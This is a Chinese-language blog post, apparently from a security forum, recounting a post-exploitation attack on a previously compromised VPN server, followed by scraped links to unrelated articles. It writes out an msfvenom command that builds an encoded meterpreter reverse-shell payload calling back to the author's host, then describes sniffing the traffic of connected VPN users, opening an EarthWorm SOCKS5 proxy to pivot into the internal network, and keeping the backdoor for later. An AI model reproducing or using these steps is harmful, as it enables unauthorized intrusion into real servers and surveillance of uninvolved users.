对"某V皮"N服务器节点的一次后渗透测试
前言:由于这个VPN节点服务器是之前拿到的,一直没时间做进一步渗透,昨天看到我蛋总表哥发红包,然后我运气爆表抢了个运气王,再加上好久没发文章了,所以就抽空测试下咯。
0×01 kali反弹shel进行测试
Kali生成一个payload
这里生成IP填写的是我外网IP地址msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=111.111.111.111 LPORT=8082 -f exe > test.exe
然后kali进行监听设置
由于我这里是做了端口映射的,所以填的IP地址就是kali的地址
当payload运行后,主动连接我的外网地址,然后路由器通过端口映射找到我的kali,然后建立连接。(没有公网服务器的也可以用这个方法)
把kali生成的后门上传到到对方服务器上运行
运行后,我们返回kali可以看到已经成功反弹shell
Netstat-bn查下网络连接信息
可以看到有几个人连接到1723端口(这个是pptp的拨号端口)
由于连接信息很多,我们可以用以下命令 过滤出想要的端口信息。
netstat -n -p tcp |find "1723"
突然有个想法,既然有人连接到这个VPN服务器,如果我抓取这台服务器的数据包,是否能搞到这些人连上vpn后都干了啥呢?
0×02 kali进行抓包分析
说干就干,我们在kali里面进行抓包设置
首先输入ipconfig /all列出网卡信息
82579LM这个是他的本地连接的网卡
然后我们输入use sniffer
可以看到网卡号82579LM序号为1
接着输入sniffer_start 1 (开始在序号为1的网卡上抓包)
然后隔一段时间,我们去下载抓取到的数据包到我们的kali。
命令:sniffer_dump 1 xpsp1.cap
下载完以后,在kali主目录下双击打开xpsp1.cap文件。
但是我发现抓到的数据包里面并没有GET或者POST请求
如果能抓到GET或者POST请求的话,比如你看到请求里面有cookie,那么我们可以用这个cookie直接登录对方登录过的网站。参考我的上一篇文章【蹭你wifi后 我竟然干了这样的事】
突然感觉没啥思路了,看来我要拜师学习了。^_^
0×03 VPN地址给我的灵感
看到这个ppp的虚拟网卡信息,加上前面抓包看到的172.16.11.7和vpn服务器产生的流量信息,我们可以知道,他的vpn虚拟内网就是172.16.11.0/24
为了验证我的想法,我们建立一个socks5代理,然后用SocksCap64连上去
这里用到的工具是EarthWorm,由于这是一台有外网的服务器,我们直接正向代理就可以了。EW使用方法可以参考【对微信卖小电影的一次内网漫游】
命令如下:
ew.exe -s ssocksd -l 888
解释:在服务器上开启一个socks5代理,端口为888
现在用SocksCap64连上去,把我们的渗透工具放进SocksCap64里面,这样就可以通过这个代理直接搞内网了。
然后就是你懂的,哈哈^_^
好可怕,套了这么多层服务器搞事情,你认为就安全了? 然而在第一层的vpn就出卖了你,后面你套10层都没用。
这么怕自己的信息泄露,那么这是在干啥好事呢?
大家自行脑补吧……
还有扫号的,黑产真可怕。
本来还有很多方法可以进行下一步渗透的,但是最近真的很忙,没时间搞了,抽空维护好后门,以后有的是机会,对吧。哈哈。
求赞,求赞,求赞,赞我的妹子越来越漂亮,赞我的表哥丁丁增长5cm。٩(๑❛ᴗ❛๑)۶
用到的工具:链接: https://pan.baidu.com/s/14iv3_H5POejr_enjV0Wv2w
请勿用于非法用途,一切后果自负。
密码在此:https://bbs.ichunqiu.com/thread-38888-1-1.html?from=beef
总结:
一、你以为套个vpn就能很安全的搞事情?对不起,vpn服务器被拿下了,搞你也是分分钟的事。
二、你以为在虚拟机就安全了?对不起,拿到你虚拟机,然后扫所有内网段,只要虚拟机能访问你本机的局域网,一样可以干掉你。
三、那么真的就没有其他办法让我们安全的搞事情了吗?,答案肯定是有的,但是方法呢,请自行百度吧,说出来有一定的风险,传播【vpn搭建方法】可是要查水表的,哈哈。
对"某V皮"N服务器节点的一次后渗透测试的更多相关文章
- 通过 CeSi + Supervisor 可视化集中管理服务器节点进程
通过 CeSi + Supervisor 可视化集中管理服务器节点进程 简介 Supervisor 的安装及基本使用 1. 安装 2. 基本使用 2.1 启动 supervisor 2.2 Supe ...
- mariadb数据库galera下添加新的服务器节点
昨天经过各种努力,终于完成了两台服务器集成的搭建,今天再新开一台服务器,在想如何加入呢?网上度娘了很久结果没搜到相关文章:哎,索性直接照着前两台服务配置,在第三台(新服务器)上配置完成后重启maria ...
- 内网其他服务器节点连接Mysql数据库很慢的解决方案
一.概述 使用jdbc方式对数据进行同步时,由于设置了数据库登录超时时间是10s,结果发现有的服务器节点可以连接,有的服务器节点不能连接Mysql数据库.排查了好长原因,最后,自己写了一个jdbc的测 ...
- 在Ubuntu 15下搭建V/P/N服务器pptpd安装和配置
在Ubuntu 15下搭建VPN服务器pptpd安装和配置 在ubuntu下配置vpn的方式有很多种,其中比较常见的是pptpd,它配置简单,但是安全性不高,不过对于一般使用来说足够了,我按照程搭建了 ...
- 生产服务器环境最小化安装后 Centos 6.5优化配置备忘
生产服务器环境最小化安装后 Centos 6.5优化配置备忘 作者:Memory 发布于:2014-8-13 15:00 Wednesday 服务器 本文 centos 6.5 优化 的项有18处: ...
- 生产服务器环境最小化安装后Centos 6.5优化配置备忘
生产服务器环境最小化安装后 Centos 6.5优化配置备忘 本文 centos 6.5 优化 的项有18处,列表如下: 1.centos6.5最小化安装后启动网卡 2.ifconfig查询IP进行S ...
- 渗透测试学习 二十九、kali安装,信息搜集,服务器扫描
kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由 ...
- HTTP-web服务器接收到client请求后的处理过程(很详细)
1. 客户发起情况到服务器网卡: 2. 服务器网卡接受到请求后转交给内核处理: 3. 内核根据请求对应的套接字,将请求交给工作在用户空间的Web服务器进程 4. Web服务器进程根据用户请求,向内核进 ...
- scp 上传文件到多个服务器节点
参考:scp批量上传文件到多台机器上(升级版) 实测,代码可运行. 1.如果遇到syntax error near unexpected token问题,基本是由于windows环境下编写的shell ...
随机推荐
- servlet 知识点 WebServlet("/")与WebServlet("/*")的区别
(1)一个servlet的请求路径,如果配置成"/",那么它可以拦截除了.jsp之外的所有的请求. (2)一个servlet的请求路径,如果配置成"/*",那么 ...
- presentation skills
下面是从一个网站摘录下来的关于presentation skill需要回答的14个问题:网站的地址为:http://www.mindtools.com/pages/article/newCS_96.h ...
- oracle 查看表空间使用情况
查看表空间剩余: ||'M' from dba_free_space group by tablespace_name 查看表空间总大小.使用大小.剩余大小,使用率.剩余率 ) useded, tru ...
- 2018.10.29 bzoj1023: [SHOI2008]cactus仙人掌图(仙人掌+单调队列优化dp)
传送门 求仙人掌的直径. 感觉不是很难. 分点在环上面和不在环上分类讨论. 不在环上直接树形dpdpdp. 然后如果在环上讨论一波. 首先对环的祖先有贡献的只有环上dfsdfsdfs序最小的点. 对答 ...
- python报错ModelNotFoundError
很可能是因为工作目录并不在sys.path中,系统无法默认的找到您的脚本文件,通过以下命令可以解决该问题: >>> import sys>>> sys.path.a ...
- Codeforces Round #524 (Div. 2) F. Katya and Segments Sets(主席树)
https://codeforces.com/contest/1080/problem/F 题意 有k个区间,区间的种类有n种,有m个询问(n,m<=1e5,k<=3e5),每次询问a,b ...
- 详细解读 :java.sql.SQLException: Connection is read-only. Queries leading to data modification are not allowed,Java报错之Connection is read-only.
问题分析: 实际开发项目中,进行insert的时候,产生这个问题是Spring框架的一个安全权限保护方法,对于方法调用的事物保护,一般配置如下: <!-- 事务管理 属性 --> < ...
- 1.9yield方法
yield()方法的作用放弃当前的cpu资源,将他让给其他的任务去占用cpu的执行时间,但放弃的时间不确定,有可能刚放弃,马上又获得cpu时间片 测试 package com.cky.thread; ...
- 一份不太简短的LaTeX模板
编译环境: Ubuntu16.04 texllive2016 sublime text3 + latextools 该模板使用与自己写文档,记笔记,记录代码,写作业等等. %!TEX program ...
- gcc和vs在c的一些区别
1.switch中每个标签后面的命令在gcc中需要{}括起来以指明作用域. 2._itoa是非标准的c和c++扩展函数,在linux下可以使用sprintf(string, "%d &q ...